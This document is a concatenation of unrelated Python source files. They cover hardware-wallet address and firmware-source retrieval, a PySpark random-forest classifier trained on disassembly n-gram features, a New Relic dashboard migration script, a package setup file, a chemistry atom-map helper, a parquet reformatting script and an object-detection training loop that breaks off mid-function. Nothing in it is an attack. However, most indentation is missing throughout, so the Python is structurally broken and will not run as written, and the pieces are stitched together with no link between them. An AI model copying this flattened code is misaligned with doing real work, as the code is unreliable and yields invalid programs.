return client.get_address(hw_session.runtime_data.hw_coin_name, bip32_path, show_display)
except keepkeylib.client.CallException as e:
if isinstance(e.args, tuple) and len(e.args) >= 2 and isinstance(e.args[1], str) and \
e.args[1].find('cancel') >= 0:
raise CancelException('Cancelled')
elif hw_session.hw_type == HWType.ledger_nano:
if isinstance(bip32_path, list):
# ledger requires bip32 path argument as a string
bip32_path = bip32_path_n_to_string(bip32_path)
adr_pubkey = ledger.get_address_and_pubkey(hw_session, bip32_path, show_display)
return adr_pubkey.get('address')
else:
raise Exception('Unknown hardware wallet type: ' + str(hw_session.hw_type))
else:
raise Exception('HW client not open.')
if message_to_display or show_display:
msg_delay = 0
else:
msg_delay = 1000
message_to_display = DEFAULT_HW_BUSY_MESSAGE
return WndUtils.run_thread_dialog(_get_address, (), True, show_window_delay_ms=msg_delay,
force_close_dlg_callback=partial(cancel_hw_thread_dialog, hw_session.hw_client))
@control_hw_call
def get_address_and_pubkey(hw_session: HwSessionInfo, hw_coin_name: str, bip32_path: str):
client = hw_session.hw_client
if client:
if isinstance(bip32_path, str):
bip32_path = bip32_path.strip()
if bip32_path.lower().find('m/') >= 0:
# removing m/ prefix because of keepkey library
bip32_path = bip32_path[2:]
if hw_session.hw_type == HWType.trezor:
if isinstance(bip32_path, str):
bip32_path = dash_utils.bip32_path_string_to_n(bip32_path)
return {
'address': trezorlib.btc.get_address(client, hw_coin_name, bip32_path, False),
'publicKey': trezorlib.btc.get_public_node(client, bip32_path).node.public_key
}
elif hw_session.hw_type == HWType.keepkey:
if isinstance(bip32_path, str):
bip32_path = dash_utils.bip32_path_string_to_n(bip32_path)
return {
'address': client.get_address(hw_coin_name, bip32_path, False),
'publicKey': client.get_public_node(bip32_path).node.public_key
}
elif hw_session.hw_type == HWType.ledger_nano:
if isinstance(bip32_path, list):
# ledger requires bip32 path argument as a string
bip32_path = bip32_path_n_to_string(bip32_path)
return ledger.get_address_and_pubkey(hw_session, bip32_path)
else:
raise Exception('Unknown hardware wallet type: ' + str(hw_session.hw_type.value))
@control_hw_call
def get_xpub(hw_session: HwSessionInfo, bip32_path: str):
client = hw_session.hw_client
if client:
if isinstance(bip32_path, str):
bip32_path = bip32_path.strip()
if bip32_path.lower().find('m/') >= 0:
bip32_path = bip32_path[2:]
if hw_session.hw_type == HWType.trezor:
if isinstance(bip32_path, str):
bip32_path = dash_utils.bip32_path_string_to_n(bip32_path)
return trezorlib.btc.get_public_node(client, bip32_path).xpub
elif hw_session.hw_type == HWType.keepkey:
if isinstance(bip32_path, str):
bip32_path = dash_utils.bip32_path_string_to_n(bip32_path)
return client.get_public_node(bip32_path).xpub
elif hw_session.hw_type == HWType.ledger_nano:
if isinstance(bip32_path, list):
# ledger requires bip32 path argument as a string
bip32_path = bip32_path_n_to_string(bip32_path)
return ledger.get_xpub(client, bip32_path)
else:
raise Exception('Unknown hardware wallet type: ' + str(hw_session.hw_type))
else:
raise Exception('HW client not open.')
def get_hw_firmware_web_sources(hw_models_allowed: Tuple[HWModel, ...],
only_official=True, only_latest=False) -> List[HWFirmwareWebLocation]:
def get_trezor_firmware_list_from_url(
base_url: str, list_url: str, official_source: bool = False, only_latest: bool = False,
model_for_this_source: Optional[str] = None, testnet_support: bool = False) -> List[HWFirmwareWebLocation]:
ret_fw_sources_: List[HWFirmwareWebLocation] = []
r = urllib.request.Request(list_url, data=None, headers={'User-Agent': app_defs.BROWSER_USER_AGENT})
f = urllib.request.urlopen(r)
c = f.read()
fw_list = simplejson.loads(c)
latest_version = ''
for idx, f in enumerate(fw_list):
url_ = url_path_join(base_url, f.get('url'))
version = f.get('version')
if isinstance(version, list):
version = '.'.join(str(x) for x in version)
else:
version = str(version)
if idx == 0:
latest_version = version
cur_model_str = f.get('model') if f.get('model') else model_for_this_source
if not only_latest or version == latest_version:
allowed = next((x for x in hw_models_allowed if HWModel.get_hw_type(x) == HWType.trezor and
HWModel.get_model_str(x) == cur_model_str), None)
if allowed:
ret_fw_sources_.append(
HWFirmwareWebLocation(
version=version,
url=url_,
device=HWType.trezor,
official=official_source,
model=cur_model_str,
testnet_support=testnet_support,
notes=f.get('notes', ''),
fingerprint=f.get('fingerprint', ''),
changelog=f.get('changelog', '')
))
return ret_fw_sources_
def get_keepkey_firmware_list_from_url(
base_url: str, list_url: str, official_source: bool = False, only_latest: bool = False,
testnet_support: bool = False) -> List[HWFirmwareWebLocation]:
"""
Keepkey releases json format as of March 2021:
{
"latest": {
"firmware": {
"version": "v6.7.0",
"url": "v6.7.0/firmware.keepkey.bin"
},
"bootloader": {
"version": "v1.1.0",
"url": "bl_v1.1.0/blupdater.bin"
}
},
"hashes": {
"bootloader": {
"6397c446f6b9002a8b150bf4b9b4e0bb66800ed099b881ca49700139b0559f10": "v1.0.0",
.....
"9bf1580d1b21250f922b68794cdadd6c8e166ae5b15ce160a42f8c44a2f05936": "v2.0.0"
},
"firmware": {
"24071db7596f0824e51ce971c1ec39ac5a07e7a5bcaf5f1b33313de844e25580": "v6.7.0",
....
"a05b992c1cadb151117704a03af8b7020482061200ce7bc72f90e8e4aba01a4f": "v5.11.0"
}
}
}
"""
ret_fw_sources_: List[HWFirmwareWebLocation] = []
# Shapeshift doesn't allow querying their sites with firmware releases from non-browser code (error 403),
# so we need to pass some browser-looking "user agent" value.
r = urllib.request.Request(list_url, data=None, headers={'User-Agent': app_defs.BROWSER_USER_AGENT})
f = urllib.request.urlopen(r)
c = f.read()
fw_list = simplejson.loads(c)
latest_version = ''
if fw_list.get('latest') and fw_list.get('latest').get('firmware'):
latest_version = fw_list['latest']['firmware'].get('version')
latest_url = fw_list['latest']['firmware'].get('url')
if fw_list.get('hashes') and fw_list.get('hashes').get('firmware'):
hf = fw_list.get('hashes').get('firmware')
if isinstance(hf, dict):
for hash in hf:
version = hf[hash]
url_ = url_path_join(base_url, version, 'firmware.keepkey.bin')
if version.startswith('v'):
version = version[1:]
if not only_latest or version == latest_version:
ret_fw_sources_.append(
HWFirmwareWebLocation(
version=version,
url=url_,
device=HWType.keepkey,
official=official_source,
model='',
testnet_support=testnet_support,
fingerprint=hash
))
return ret_fw_sources_
ret_fw_sources: List[HWFirmwareWebLocation] = []
try:
project_url = app_defs.PROJECT_URL.replace('//github.com', '//raw.githubusercontent.com')
url = url_path_join(project_url, 'master', 'hardware-wallets/firmware/firmware-sources.json')
response = urllib.request.urlopen(url)
contents = response.read()
for fw_src_def in simplejson.loads(contents):
try:
official_source = fw_src_def.get('official')
hw_type = HWType.from_string(fw_src_def.get('device')) if fw_src_def.get('device') else None
hw_model_symbol = fw_src_def.get('model')
url = fw_src_def.get('url')
url_base = fw_src_def.get('url_base')
testnet_support = fw_src_def.get('testnetSupport', True)
if not url_base:
url_base = project_url
                if not re.match(r'\s*http(s)?://', url, re.IGNORECASE):
url = url_path_join(url_base, url)
if only_official is False or official_source is True:
allowed_model = next((x for x in hw_models_allowed if HWModel.get_hw_type(x) == hw_type and
(not hw_model_symbol or HWModel.get_model_str(x) == hw_model_symbol)), None)
if allowed_model:
if hw_type == HWType.trezor:
lst = get_trezor_firmware_list_from_url(
base_url=url_base, list_url=url, only_latest=only_latest,
official_source=official_source, model_for_this_source=hw_model_symbol,
testnet_support=testnet_support)
ret_fw_sources.extend(lst)
elif hw_type == HWType.keepkey:
lst = get_keepkey_firmware_list_from_url(
base_url=url_base, list_url=url, official_source=official_source,
only_latest=only_latest, testnet_support=testnet_support)
ret_fw_sources.extend(lst)
except Exception:
logging.exception('Exception while processing firmware source')
except Exception as e:
        logging.error('Error while loading hardware-wallets/firmware/firmware-sources.json file from GitHub: ' + str(e))
return ret_fw_sources
|
import argparse
import re
import numpy as np
from operator import add
from pyspark import SparkContext
from pyspark.ml.feature import NGram
from pyspark.sql import SparkSession
from pyspark.ml.linalg import Vectors
from pyspark.ml.feature import StringIndexer
from pyspark.ml.classification import RandomForestClassifier
from pyspark.sql.types import *
BYTES_PATTERN = re.compile(r'\s([A-F0-9]{2})\s')
SEGMENT_PATTERN = re.compile(r'([a-zA-Z]+):[a-zA-Z0-9]{8}[\t\s]')
OPCODE_PATTERN = re.compile(r'([\s])([A-F0-9]{2})([\s]+)([a-z]+)([\s+])')
def preprocess(data_folder_path, filenames, type):
myRDDlist = []
for filename in filenames:
new_rdd = sc.textFile(data_folder_path +"/"+ filename + type).map(lambda x: (filename,x)).groupByKey().map(lambda x: (x[0],' '.join(x[1])))
myRDDlist.append(new_rdd)
Spark_Full = sc.union(myRDDlist)
return Spark_Full
def get_filename_label_pair(filenames_data_rdd,labels_rdd):
"""
This function matches the filename with label
--input-------------------------------------
filenames_data_rdd : [<hash1>, <hash2>, ...]
labels_rdd : [label1, label2, ...]
--output------------------------------------
filename_label_pair : [(<hash1>,<label1>), (<hash2>,<label2>), ...]
"""
id_filenames_rdd = filenames_data_rdd.zipWithIndex().map(lambda x: (x[1],x[0]))
id_label_rdd = labels_rdd.zipWithIndex().map(lambda x: (x[1],x[0]))
filename_label_pair = id_filenames_rdd.join(id_label_rdd).map(lambda x: x[1])
return filename_label_pair
def extract_features(file_rdd, feature_name):
"""
This function extracts the required features
--input-------------------------------------
file_rdd : [(<hash1>, <content1>), ...]
feature_name : str
--output------------------------------------
filename_label_pair : [(<hash1>,<feature1>), (<hash1>,<feature2>), ..., (<hashN>,<featureK>)]
"""
if feature_name=='bytes':
return file_rdd.map(lambda x: (x[0],BYTES_PATTERN.findall(x[1]))).flatMapValues(lambda x:x)
elif feature_name=='segment':
return file_rdd.map(lambda x: (x[0],SEGMENT_PATTERN.findall(x[1]))).flatMapValues(lambda x:x)
elif feature_name=='opcode':
return file_rdd.map(lambda x: (x[0],OPCODE_PATTERN.findall(x[1]))).flatMapValues(lambda x:x).map(lambda x: (x[0],x[1][3]))
else:
return "Invalid input!"
def Ngram(feature_rdd,start,end):
'''
--input-------------------------------------
feature_rdd : [(<hash1>,<feature1>), (<hash1>,<feature2>), ..., (<hashN>,<featureK>)]
--output------------------------------------
Ngram_count : [((<hash>,<ngram feature>),cnt), ...]
'''
Ngram_list = []
for i in range(start,end):
Ngram_list.append(Ngram_feature(i, feature_rdd))
Ngram_count = sc.union(Ngram_list)
return Ngram_count
def Ngram_feature(N, feature_rdd):
'''
Extract and count N-gram. Leave top 1000 n-gram features if it's 2-gram or more.
Input:
feature_rdd : [(<hash1>,<feature1>), (<hash1>,<feature2>), ..., (<hashN>,<featureK>)]
Output:
freq_ngram_count_rdd : [((<hash>,<ngram feature>),cnt), ...]
'''
feature_rdd = feature_rdd.groupByKey().map(lambda x: (x[0],list(x[1])))
df = spark.createDataFrame(feature_rdd).toDF("file_names", "features")
ngram = NGram(n=N, inputCol="features", outputCol="ngrams")
ngramDataFrame = ngram.transform(df)
ngram_rdd = ngramDataFrame.rdd.map(tuple).map(lambda x: (x[0],x[2])).flatMapValues(lambda x: x)
ngram_count_rdd = ngram_rdd.map(lambda x: ((x),1)).reduceByKey(add)
freq_ngram_count_rdd = ngram_count_rdd
if not N == 1:
#[(<ngram feature>,cnt), ...]
topN_ngram_count_rdd = freq_ngram_count_rdd.map(lambda x: (x[0][1],x[1])).reduceByKey(add)
#[((<ngram feature>,cnt),index), ...]
topN_ngram_count_rdd = topN_ngram_count_rdd.sortBy(lambda x: x[1],ascending=False).zipWithIndex()
length = topN_ngram_count_rdd.count()
#top [(<ngram feature>,cntSum), ...]
topN_ngram_count_rdd = topN_ngram_count_rdd.filter(lambda x: x[1]<1000).map(lambda x: x[0])
#freq [(<ngram feature>,(<hash>,cnt)), ...]
freq_ngram_count_rdd = freq_ngram_count_rdd.map(lambda x: (x[0][1],(x[0][0],x[1])))
#[(<ngram feature>,(cntSum,(<hash>,cnt))), ...]
freq_ngram_count_rdd = topN_ngram_count_rdd.join(freq_ngram_count_rdd).map(lambda x: ((x[1][1][0],x[0]),x[1][1][1]))
return freq_ngram_count_rdd
def build_full_feature_list(features,length):
'''
Build a full feature list using numpy array (very fast)
'''
full_feature_narray = np.zeros(length,)
full_feature_narray[features[:,0]] = features[:,1]
return full_feature_narray
def test_RF_structure(all_test_features_count,distinct_features_rdd):
'''
Build the data structure used for testing data
Leave only features that already appear in training
Input:
all_test_features_count : [(<ngram feature>,(<hash>,cnt)), ...]
distinct_features_rdd : [(<ngram feature>,index), ...]
Output:
all_test_features_count : [(<ngram feature>,((<hash>,cnt),index)), ...]
'''
#--[(<ngram feature>,(<hash>,cnt)), ...]-----------------------------------------
all_test_features_count = all_test_features_count.map(lambda x: (x[0][1],(x[0][0],x[1])))
#--[(<ngram feature>,(index,(<hash>,cnt))), ...]-----------------------------------------
all_test_features_count = all_test_features_count.leftOuterJoin(distinct_features_rdd).filter(lambda x: not x[1][1]==None)
#--[(<hash>,(index,cnt)), ...]-------------------------------------------------------
full_features_index_count_rdd = all_test_features_count.map(lambda x: (x[1][0][0],(x[1][1],x[1][0][1]))).groupByKey().map(lambda x: (x[0],np.asarray(list(x[1]),dtype=int)))
length = distinct_features_rdd.count()
#--[(<hash>,[cnt1, cnt2, ...]]), ...]-------------------------------------------------------
full_test_feature_count_rdd = full_features_index_count_rdd.map(lambda x: (x[0],Vectors.dense(list(build_full_feature_list(x[1],length)))))
test_rdd = full_test_feature_count_rdd.map(lambda x: len(list(x[1])))
return full_test_feature_count_rdd
def RF_structure(all_features_count):
'''
Build the data structure used for training data
Input:
all_features_count : [((<hash>,<ngram feature>),cnt), ...]
Output:
full_feature_count_rdd : [((<hash1>,<label1>),[cnt1,cnt2,...]), ...]
'''
#--[(<ngram feature>,index), ...]------------------------------------------------
distinct_features_rdd = all_features_count.map(lambda x: x[0][1]).distinct().zipWithIndex()
length = distinct_features_rdd.count()
#--[(<ngram feature>,(<hash>,cnt)), ...]-----------------------------------------
all_features_count_rdd = all_features_count.map(lambda x: (x[0][1],(x[0][0],x[1])))
#--[(<hash>,(index,cnt)), ...]---------------------------------------------------
feature_id_count_rdd = distinct_features_rdd.join(all_features_count_rdd).map(lambda x: (x[1][1][0],(x[1][0],x[1][1][1])))
#--[(<hash>,[(index,cnt), ...]), ...]--------------------------------------------
feature_id_count_rdd = feature_id_count_rdd.groupByKey().map(lambda x: (x[0],np.asarray(list(x[1]),dtype=int)))
#--[(<hash>,DenseVector([cnt1,cnt2,...])), ...]-----------------------------------------------
full_feature_count_rdd = feature_id_count_rdd.map(lambda x: (x[0], Vectors.dense(list(build_full_feature_list(x[1],length)))))
test_rdd = full_feature_count_rdd.map(lambda x: len(list(x[1])))
return full_feature_count_rdd, distinct_features_rdd
def create_indexed_df(full_train_feature_rdd):
'''
input: [(<hash1>,label1,[cnt1,cnt2,...]), ...]
'''
df = spark.createDataFrame(full_train_feature_rdd).toDF("name","label", "features")
stringIndexer = StringIndexer(inputCol="name", outputCol="indexed")
si_model = stringIndexer.fit(df)
indexed_df = si_model.transform(df)
indexed_df.show()
return indexed_df
def RF(indexed_df):
RF_model = RandomForestClassifier(numTrees=50, maxDepth=25, labelCol="label")
td_new = change_column_datatype(indexed_df,"label",DoubleType)
model = RF_model.fit(td_new)
return model
def change_column_datatype(td,col_name,datatype):
td_new = td.withColumn(col_name, td[col_name].cast(datatype()))
return td_new
if __name__ == "__main__":
sc = SparkContext()
spark = SparkSession.builder.master("yarn").appName("Word Count").config("spark.some.config.option", "some-value").getOrCreate()
parser = argparse.ArgumentParser(description = "CSCI 8360 Project 2",
epilog = "answer key", add_help = "How to use",
prog = "python p2.py [asm_folder_path] [bytes_folder_path] [training_file] [training_label] [testing_file] [output_path]")
# Required args
parser.add_argument("paths", nargs=6,
help = "Paths of asm_folder, bytes_folder, training_data, training_labels, and testing-data.")
# Optional args
parser.add_argument("-t", "--testing_label", default = None, help = "path of testing label")
args = vars(parser.parse_args())
data_asm_folder_path = args['paths'][0]
data_bytes_folder_path = args['paths'][1]
training_file_names = args['paths'][2]
training_label = args['paths'][3]
test_file_names = args['paths'][4]
output_path = args['paths'][5]
test_label = args['testing_label']
#---Read in the data names and labels------------------------------------------
train_filenames_rdd = sc.textFile(training_file_names)
train_filenames_list = train_filenames_rdd.collect()
train_labels_rdd = sc.textFile(training_label)
test_filenames_rdd =sc.textFile(test_file_names)
test_filenames_list = test_filenames_rdd.collect()
    test_labels_rdd = sc.textFile(test_label) if test_label else None
#---Read in actual bytes/asm files---------------------------------------------
#---format: [(<hash1>,<content1>),(<hash2>,<content2>), ...]-------------------
train_asm_file_rdd = preprocess(data_asm_folder_path, train_filenames_list,".asm")
# train_byte_file_rdd = preprocess(data_bytes_folder_path, train_filenames_list,".bytes")
test_asm_file_rdd = preprocess(data_asm_folder_path, test_filenames_list,".asm")
# test_byte_file_rdd = preprocess(data_bytes_folder_path, test_filenames_list,".bytes")
#---Create a label+filename pair-------------------------------------------------------
#---output: [(<hash1>,<label1>), (<hash2>,<label2>), ...]------------------------------
filename_label_pair_rdd = get_filename_label_pair(train_filenames_rdd, train_labels_rdd)
#---Extract the feaures----------------------------------------------------------------
#---output: [(<hash1>,<feature1>), (<hash1>,<feature2>), ..., (<hashN>,<featureK>)]----
# train_bytes_rdd = extract_features(train_byte_file_rdd, 'bytes')
train_segment_rdd = extract_features(train_asm_file_rdd, 'segment')
# train_opcode_rdd = extract_features(train_asm_file_rdd, 'opcode')
# test_bytes_rdd = extract_features(test_byte_file_rdd, 'bytes')
test_segment_rdd = extract_features(test_asm_file_rdd, 'segment')
# test_opcode_rdd = extract_features(test_asm_file_rdd, 'opcode')
#---Find N gram of the features------------------------------------------------
#---output: [((<hash>,<ngram feature>),cnt), ...]------------------------------
# train_Ngram_bytes_rdd = Ngram(train_bytes_rdd,1,2)
train_Segment_rdd = Ngram(train_segment_rdd,1,2)
# train_Ngram_opcode_rdd = Ngram(train_opcode_rdd,4,5)
# test_Ngram_bytes_rdd = Ngram(test_bytes_rdd,1,2)
test_Segment_rdd = Ngram(test_segment_rdd,1,2)
# test_Ngram_opcode_rdd = Ngram(test_opcode_rdd,4,5)
all_train_features_count = train_Segment_rdd#.union(train_Ngram_bytes_rdd)
all_test_features_count = test_Segment_rdd#.union(test_Ngram_bytes_rdd)
#---Pre Random Forest(Prepare for the data structure)----------------------------
#---[(<hash1>,[cnt1,cnt2,...]), ...]---------------------------------------------
full_train_feature_rdd, distinct_features_rdd = RF_structure(all_train_features_count)
full_test_feature_rdd = test_RF_structure(all_test_features_count,distinct_features_rdd)
#---Link label in----------------------------------------------------------------
#---output: [(<hash1>,label1,[cnt1,cnt2,...]), ...]------------------------------
full_train_feature_rdd = filename_label_pair_rdd.join(full_train_feature_rdd).map(lambda x: (x[0],x[1][0],x[1][1]))
#---Create Dataframe for training------------------------------------------------
feature_label_full_df = create_indexed_df(full_train_feature_rdd)
#---Training Random Forest Model-------------------------------------------------
training_model = RF(feature_label_full_df)
#---Create dataframe for testing-------------------------------------------------
test_feature_df = spark.createDataFrame(full_test_feature_rdd).toDF("name","features")
stringIndexer = StringIndexer(inputCol="name", outputCol="indexed")
test_model = stringIndexer.fit(test_feature_df)
test_feature_indexed_df = test_model.transform(test_feature_df)
#---Prediction--------------------------------------------------------------------
result = training_model.transform(test_feature_indexed_df)
result = result.withColumn("prediction", result["prediction"].cast("int"))
result.show()
result = result.select("prediction","name")
#---Write to Bucket---------------------------------------------------------------
rdd = result.rdd.map(tuple).map(lambda x: (x[1],x[0]))
test_file_names = test_filenames_rdd.zipWithIndex()
predict_rdd = rdd.join(test_file_names).sortBy(lambda x: x[1][1]).map(lambda x:x[1][0])
pre = spark.createDataFrame(predict_rdd.map(lambda x: ('prediction',x))).toDF("name","prediction")
pre_repa = pre.repartition(1)
    pre_repa.select("prediction").write.csv(output_path)
    #---Print Result if testing labels are given-------------------------------------
    if test_label is not None:
predict = predict_rdd.collect()
test_rdd_label = test_labels_rdd.collect()
score = 0.0
for i in range(len(predict)):
predict[i] = str(predict[i])
if predict[i] == test_rdd_label[i]:
score +=1.0
accuracy = score*100/len(predict)
print("Accuracy: "+str(accuracy)+"%")
|
import os
import argparse
import library.utils as utils
import library.migrationlogger as m_logger
import library.localstore as store
import library.clients.entityclient as ec
import library.status.dashboard_status as ds
log = m_logger.get_logger(os.path.basename(__file__))
def print_args(args):
#log.info("Using fromFile : " + args.fromFile[0])
log.info("Using sourceAccount : " + str(args.sourceAccount[0]))
#log.info("Using sourceApiKey : " + len(src_api_key[:-4])*"*"+src_api_key[-4:])
def configure_parser():
parser = argparse.ArgumentParser(description='Migrate Dashboards')
parser.add_argument('--sourceDashboard', nargs=1, type=str, required=True,
help='Path to file with dashboard names(newline separated)')
parser.add_argument('--sourceAccount', nargs=1, type=int, required=True, help='Source accountId')
parser.add_argument('--sourceApiKey', nargs=1, type=str, required=True, help='Source account API Key or \
set environment variable ENV_SOURCE_API_KEY')
parser.add_argument('--targetStore', nargs=1, type=str, required=True, help='Target Store')
parser.add_argument('--sourceStore', nargs=1, type=str, required=True, help='Store name in Source')
return parser
def dump_dashboard(per_api_key, name, acct_id, *, get_widgets=True, region='us'):
result = ec.get_dashboard_definition(per_api_key, name, acct_id, region)
if not result:
return None
if not get_widgets:
return result
widgets_result = ec.get_dashboard_widgets(per_api_key, result['guid'], region)
if not widgets_result['entityFound']:
return None
return widgets_result['entity']
def update_store(src_store, tgt_store, entity):
if 'guid' in entity:
del entity['guid']
if 'name' in entity:
entity['name'] = entity['name'].replace(src_store,tgt_store)
if not 'pages' in entity:
return
for page in entity['pages']:
if not 'widgets' in page:
continue
for widget in page['widgets']:
if not 'rawConfiguration' in widget:
continue
if not 'nrqlQueries' in widget['rawConfiguration']:
continue
for query in widget['rawConfiguration']['nrqlQueries']:
if ('query' in query and query['query'].find(src_store) != -1):
query['query'] = query['query'].replace(src_store,tgt_store)
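# A minimal illustration of update_store (the dashboard structure below is a trimmed
# assumption of what dump_dashboard returns; real entities carry more fields):
#   entity = {'name': 'Sales - STORE_A',
#             'pages': [{'widgets': [{'rawConfiguration': {'nrqlQueries': [
#                 {'query': "SELECT count(*) FROM Transaction WHERE store = 'STORE_A'"}]}}]}]}
#   update_store('STORE_A', 'STORE_B', entity)
#   # entity['name'] is now 'Sales - STORE_B' and the NRQL query now references STORE_B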
def main():
parser = configure_parser()
args = parser.parse_args()
src_api_key = utils.ensure_source_api_key(args)
src_dashboard = args.sourceDashboard[0]
src_store = args.sourceStore[0]
nrAccount = args.sourceAccount[0]
tgt_store = args.targetStore[0]
#tgt_api_key = utils.ensure_target_api_key(args)
#src_region = utils.ensure_source_region(args)
print_args(args)
dbJson = dump_dashboard(src_api_key, src_dashboard, nrAccount)
update_store(src_store,tgt_store, dbJson)
log.info('db: ')
log.info(dbJson)
result = ec.post_dashboard(src_api_key, dbJson, nrAccount, 'US')
log.info(result)
if __name__ == '__main__':
main()
|
import setuptools
from pyncli import __version__ as pyncli_version
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="pyncli",
version=pyncli_version,
author="Evgeniy Semenov",
author_email="[email protected]",
description="Command Line Interface for NextCloud GroupFolder app",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/edelwi/pyncli",
packages=setuptools.find_packages(),
entry_points={
'console_scripts':
['pnc = pyncli.nc:main',
'pnc_test = pyncli.test.runall:main',
]
},
install_requires=[
'ldap3>=2.5.1',
'requests>=2.18.4',
'lxml>=4.2.5',
        'python-dotenv>=0.10.0',
'certifi'
],
classifiers=[
"Development Status :: 1 - Planning",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
) |
"""
Function Group Utilities
========================
"""
from __future__ import annotations
from collections import abc
from ...atom import Atom
__all__ = (
'get_atom_map',
)
def get_atom_map(
id_map: dict[int, int],
atoms: abc.Iterable[Atom],
) -> dict[int, Atom]:
"""
Get an atom map from an `id_map`.
The atom map maps the id of an existing atom to the atom it
should be replaced by. The atom will have the same type (i.e.
element) but might have a different id.
Parameters:
id_map:
Maps the id of an atom to its new id.
atoms:
The atoms which should have their ids updated as
specified by the `id_map`.
Returns:
        A mapping from the id of an atom to the atom it should be
replaced by.
"""
atom_map = {}
for atom in atoms:
atom_id = atom.get_id()
if atom_id not in atom_map:
new_id = id_map.get(atom_id, atom_id)
atom_map[atom_id] = atom.with_id(new_id)
return atom_map
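# Hedged usage sketch: assuming Atom instances expose get_id() and with_id() as used
# above, an id_map of {0: 5} relabels the atom with id 0 while leaving all other atoms
# unchanged, e.g. get_atom_map({0: 5}, atoms) -> {0: <atom relabelled to id 5>, 1: <atom 1>, ...}.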
|
import pandas as pd
import sys
import os
import sklearn.model_selection
# This helper script was written to reformat the covid protein receptor
# docking dataframes produced by A. Partin into input files for the
# smiles_regress_transformer.py code that Rick produced.
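# Assumed invocation (the parquet name is the example mentioned in the comment below;
# any docking dataframe with 'reg' and 'SMILES' columns should work):
#   python this_script.py ml.RDRP_7BV2_A_3_F.Orderable_zinc_db_enaHLL.sorted.4col.dd.parquet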
data_path = sys.argv[1]
base = os.path.basename(data_path)
# classification is in cls column, regression is in reg
outfile = '{}.xform-smiles.csv.reg'.format(base)
df = pd.read_parquet(data_path)
df2=pd.DataFrame()
# cls or reg for ml.RDRP_7BV2_A_3_F.Orderable_zinc_db_enaHLL.sorted.4col.dd.parquet
df2[['type','smiles']]=df[['reg','SMILES']]
x_train, x_val = sklearn.model_selection.train_test_split(df2, test_size=.2, train_size=.8)
x_train.to_csv('{}.train'.format(outfile), index=None)
x_val.to_csv('{}.val'.format(outfile), index=None)
df2.to_csv('{}'.format(outfile),index=None)
|
import torch
from torch import nn, optim
from torch.utils.data import DataLoader, sampler
from tqdm import tqdm
from argument import get_args
from backbone import vovnet39, vovnet57, resnet50, resnet101
from utils.dataset import COCODataset, collate_fn
from model import ATSS,Efficientnet_Bifpn_ATSS
from utils import transform
from utils.lrscheduler import GluonLRScheduler,iter_per_epoch_cal,set_schduler_with_wormup
from evaluate import evaluate
from distributed import (
get_rank,
synchronize,
reduce_loss_dict,
DistributedSampler,
all_gather,
get_world_size,
convert_sync_bn,
simple_group_split
)
from utils.ema import EMA
import os,cv2
from tensorboardX import SummaryWriter
import numpy as np
def accumulate_predictions(predictions):
all_predictions = all_gather(predictions)
if get_rank() != 0:
return
predictions = {}
for p in all_predictions:
predictions.update(p)
ids = list(sorted(predictions.keys()))
if len(ids) != ids[-1] + 1:
        print('Evaluation results are not contiguous')
predictions = [predictions[i] for i in ids]
return predictions
@torch.no_grad()
def valid_loss(args, epoch, loader, dataset, model, device, logger=None):
loss_regress_list = []
loss_cls_list = []
loss_centerness_list = []
if args.distributed:
model = model.module
torch.cuda.empty_cache()
model.eval()
if get_rank() == 0:
pbar = tqdm(enumerate(loader), total=len(loader), dynamic_ncols=True)
else:
pbar = enumerate(loader)
preds = {}
for idx, (images, targets, ids) in pbar:
model.zero_grad()
images = images.to(device)
targets = [target.to(device) for target in targets]
pred,loss_dict = model(images,targets,args.val_with_loss)
loss_reduced = reduce_loss_dict(loss_dict)
loss_cls = loss_reduced['loss_cls'].mean().item()
loss_box = loss_reduced['loss_reg'].mean().item()
loss_center = loss_reduced['loss_centerness'].mean().item()
loss_regress_list.append(float(loss_box))
loss_cls_list.append(float(loss_cls))
loss_centerness_list.append(float(loss_center))
if logger:
log_group_name = 'validation'
logger.add_scalar(log_group_name+'/class_loss',np.mean(loss_cls_list),epoch)
logger.add_scalar(log_group_name+'/regression_loss',np.mean(loss_regress_list),epoch)
logger.add_scalar(log_group_name+'/centerness_loss',np.mean(loss_centerness_list),epoch)
loss_all = np.mean(loss_cls_list) + np.mean(loss_regress_list) + np.mean(loss_centerness_list)
logger.add_scalar(log_group_name+'/loss_epoch_all',loss_all,epoch)
return loss_all
@torch.no_grad()
def valid(args, epoch, loader, dataset, model, device, logger=None,ema=None):
if args.distributed:
model = model.module
torch.cuda.empty_cache()
model.eval()
if get_rank() == 0:
pbar = tqdm(enumerate(loader), total=len(loader), dynamic_ncols=True)
else:
pbar = enumerate(loader)
preds = {}
for idx, (images, targets, ids) in pbar:
model.zero_grad()
images = images.to(device)
if ema: ema.apply_shadow()
pred, _ = model(images)
if ema: ema.restore()
pred = [p.to('cpu') for p in pred]
preds.update({id: p for id, p in zip(ids, pred)})
preds = accumulate_predictions(preds)
if get_rank() != 0:
return
evl_res = evaluate(dataset, preds)
# writing log to tensorboard
if logger:
log_group_name = "validation"
box_result = evl_res['bbox']
logger.add_scalar(log_group_name + '/AP', box_result['AP'], epoch)
logger.add_scalar(log_group_name + '/AP50', box_result['AP50'], epoch)
logger.add_scalar(log_group_name + '/AP75', box_result['AP75'], epoch)
logger.add_scalar(log_group_name + '/APl', box_result['APl'], epoch)
logger.add_scalar(log_group_name + '/APm', box_result['APm'], epoch)
logger.add_scalar(log_group_name + '/APs', box_result['APs'], epoch)
return preds
def train(args, epoch, loader, model, optimizer, device, scheduler=None,logger=None,ema=None):
epoch_loss = []
model.train()
scheduler, warmup_scheduler = scheduler[0], scheduler[1]
if get_rank() == 0:
pbar = tqdm(enumerate(loader), total=len(loader), dynamic_ncols=True)
else:
pbar = enumerate(loader)
for idx, (images, targets, _) in pbar:
model.zero_grad()
images = images.to(device)
targets = [target.to(device) for target in targets]
_, loss_dict = model(images, targets=targets)
loss_cls = loss_dict['loss_cls'].mean()
loss_box = loss_dict['loss_reg'].mean()
loss_center = loss_dict['loss_centerness'].mean()
loss = loss_cls + loss_box + loss_center
loss.backward()
nn.utils.clip_grad_norm_(model.parameters(), 10)
optimizer.step()
# ema update
ema.update()
# for iter scheduler
if idx<warmup_scheduler.niters and epoch<args.warmup_epoch:
warmup_scheduler.step()
else:
scheduler.step()
loss_reduced = reduce_loss_dict(loss_dict)
loss_cls = loss_reduced['loss_cls'].mean().item()
loss_box = loss_reduced['loss_reg'].mean().item()
loss_center = loss_reduced['loss_centerness'].mean().item()
